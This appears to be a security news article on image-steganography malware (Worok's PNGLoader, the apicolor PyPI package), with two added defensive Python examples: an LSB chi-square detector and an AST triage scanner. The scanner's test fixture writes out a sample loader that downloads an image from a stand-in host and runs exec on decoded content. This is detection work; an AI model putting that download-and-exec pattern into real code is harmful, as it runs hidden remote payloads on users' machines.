New threat actors have been discovered by researchers using PNG files to spread malware.
Since early September 2022, a threat actor going by the name Worok has been observed by both ESET and Avast using this technique.
Worok has apparently been active in the Middle East, Southeast Asia, and South Africa, focusing on high-profile victims like government organisations.
Attack with multiple waves
DLL sideloading is used by the attackers to run the CLRLoader malware, which in turn loads the PNGLoader DLL, which can decipher the obfuscated code buried in PNG files.
The resulting executable is DropBoxControl, a .NET C# information stealer written specifically to exploit Dropbox for illicit communication and data theft. The malware appears to support many operations, including: running cmd /c, launching an executable, downloading and uploading data to and from Dropbox, erasing data from target endpoints, creating new directories (for additional backdoor payloads), and extracting system information.
Researchers have concluded that Worok is the product of a stealthy cyberespionage group that operates laterally across target networks and steals confidential information. It appears to be using tools that are unique to itself, as the researchers have never seen them employed by any other entity.
Worok was said to employ “least significant bit (LSB) encoding,” which hides malicious code in the least significant bits of image pixels.
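To show what a defender can do with that description, here is an added example that is not part of the article or any vendor report: the pairs-of-values chi-square test of Westfeld and Pfitzmann, a classic statistical check for LSB replacement. Overwriting the LSB plane drives the counts of each value pair (2k, 2k+1) towards their common mean, so a channel whose pairs are "too equal" is suspicious. The code is pure Python with no image library; the sample "images" are flat lists of 8-bit channel values constructed inline (a skewed synthetic cover, and the same cover with its LSB plane randomised to stand in for a full-capacity embedding of compressed or encrypted data). The 3:1 even/odd skew, the sample size and the seeds are assumptions of this example.

```python
"""Added example: pairs-of-values chi-square detector for LSB replacement.
Not code from the article; the sample channels are constructed inline."""
import math
import random


def channel_histogram(values):
    """Count how often each 8-bit sample value 0..255 occurs."""
    hist = [0] * 256
    for v in values:
        hist[v] += 1
    return hist


def pov_chi_square(hist, min_expected=5):
    """Pairs-of-values statistic. LSB replacement pushes the counts of each
    pair (2k, 2k+1) towards their mean, so the statistic becomes small.
    Sparse pairs are skipped, as in the original test. Returns (chi2, dof)."""
    chi2, categories = 0.0, 0
    for k in range(128):
        even, odd = hist[2 * k], hist[2 * k + 1]
        expected = (even + odd) / 2
        if expected < min_expected:
            continue
        chi2 += (even - expected) ** 2 / expected
        categories += 1
    return chi2, max(categories - 1, 0)


def chi2_upper_tail(x, dof):
    """P(X >= x) for a chi-square variable with dof degrees of freedom,
    via the Wilson-Hilferty normal approximation (adequate for dof >= ~30)."""
    if dof <= 0:
        return 0.0
    mean = 1 - 2 / (9 * dof)
    sd = math.sqrt(2 / (9 * dof))
    z = ((x / dof) ** (1 / 3) - mean) / sd
    return 0.5 * math.erfc(z / math.sqrt(2))


def lsb_embedding_probability(values):
    """Probability that the pair counts are equalised, i.e. that the LSB
    plane has been overwritten: near 1 for a fully embedded channel,
    near 0 for a natural cover whose pair counts are uneven."""
    chi2, dof = pov_chi_square(channel_histogram(values))
    return chi2_upper_tail(chi2, dof)


def make_synthetic_cover(n, seed=1):
    """Constructed cover channel (assumption, not a real image): even values
    outnumber odd ones 3:1, mimicking the uneven pair counts of natural data."""
    rng = random.Random(seed)
    return [2 * rng.randrange(128) + (1 if rng.random() < 0.25 else 0)
            for _ in range(n)]


def simulate_lsb_replacement(values, seed=2):
    """Overwrite every LSB with a random bit: the statistical footprint a
    full-capacity embedding of noise-like data leaves behind. Used here only
    to validate the detector against a known-positive sample."""
    rng = random.Random(seed)
    return [(v & 0xFE) | rng.getrandbits(1) for v in values]


if __name__ == "__main__":
    cover = make_synthetic_cover(20000)
    stego = simulate_lsb_replacement(cover)
    print("cover  p =", round(lsb_embedding_probability(cover), 4))
    print("stego  p =", round(lsb_embedding_probability(stego), 4))
```

The test is only sensitive to sequential, full-rate LSB replacement; a payload that fills a small fraction of the image, or one embedded with LSB matching rather than replacement, will not equalise the pairs and needs other detectors. In practice it would be run per colour channel on the decoded PNG pixel data.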
It would appear that the use of steganography in cybercrime is on the rise. Check Point Research (CPR) recently discovered a malicious package on the Python package repository PyPI that delivers Trojan malware called apicolor via an image. The malware spread primarily through GitHub.
The seemingly safe package downloads an image from the internet, installs additional tools to process the image, and then calls exec to run the processed output.
The judyb package, a steganography add-on that can decode hidden messages in images, is one of the two tools it requires. Researchers were then able to trace the origin of the image back to a web downloader that delivered malicious packages to the victim’s endpoint.
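The pattern just described (fetch an image, decode it with a steganography helper, hand the result to exec) is something a package-vetting pipeline can look for statically. Below is an added example of such a triage check, written for this page and not taken from the CPR analysis or from the apicolor package. It parses a Python source file with the standard `ast` module and flags exec()/eval() calls whose argument is not a string literal, then correlates them with network and image/steganography imports. The list of module names is an assumption of this example (judyb is the one the article names), and the two embedded sample files are constructed stand-ins; in particular the `lsb.reveal` call in the suspicious sample is a made-up function name, not judyb's real API.

```python
"""Added example: AST-based triage for 'download, decode image, exec' in
Python package code. Not the CPR tooling; sample inputs are constructed."""
import ast

# Module roots worth correlating with dynamic code execution. judyb is the
# package the article names; the others are assumptions of this example.
NETWORK_MODULES = {"requests", "urllib", "http", "socket"}
STEGO_IMAGE_MODULES = {"judyb", "stegano", "PIL"}


def _root(module_name):
    """'urllib.request' -> 'urllib'."""
    return module_name.split(".")[0]


def analyse_package_source(source, filename="<package>"):
    """Static triage of one Python source file. Returns the dynamic-code
    findings, the suspicious imports seen, and a coarse verdict."""
    tree = ast.parse(source, filename)
    imported, dynamic = set(), []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            imported.update(_root(a.name) for a in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            imported.add(_root(node.module))
        elif isinstance(node, ast.Call):
            fn = node.func
            name = fn.id if isinstance(fn, ast.Name) else None
            # exec/eval on a literal is odd but inspectable; on a computed
            # value it is the classic 'decode then run' loader shape.
            if name in ("exec", "eval") and node.args:
                if not isinstance(node.args[0], ast.Constant):
                    dynamic.append({"line": node.lineno, "call": name})
    network = sorted(imported & NETWORK_MODULES)
    stego = sorted(imported & STEGO_IMAGE_MODULES)
    if dynamic and network and stego:
        verdict = "high"    # fetches remote data, handles images, runs computed code
    elif dynamic:
        verdict = "medium"  # dynamic code execution without the other signals
    else:
        verdict = "low"
    return {"dynamic_code": dynamic, "network": network,
            "stego": stego, "verdict": verdict}


# Constructed sample mimicking the shape the article describes. The host is a
# reserved .invalid name and lsb.reveal is a hypothetical function name.
SUSPICIOUS_SETUP = """\
import requests
from judyb import lsb
payload = requests.get("http://example.invalid/cover.png").content
open("cover.png", "wb").write(payload)
exec(lsb.reveal("cover.png"))
"""

# Constructed benign sample: an ordinary setup script.
BENIGN_SETUP = """\
from setuptools import setup
setup(name="example", version="0.1")
"""


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        print(label, analyse_package_source(src))
```

This catches only the direct form; a loader that reaches exec through `getattr(builtins, ...)` or string-built names needs a broader rule set, and the verdict should be one input to a review, not an automatic block.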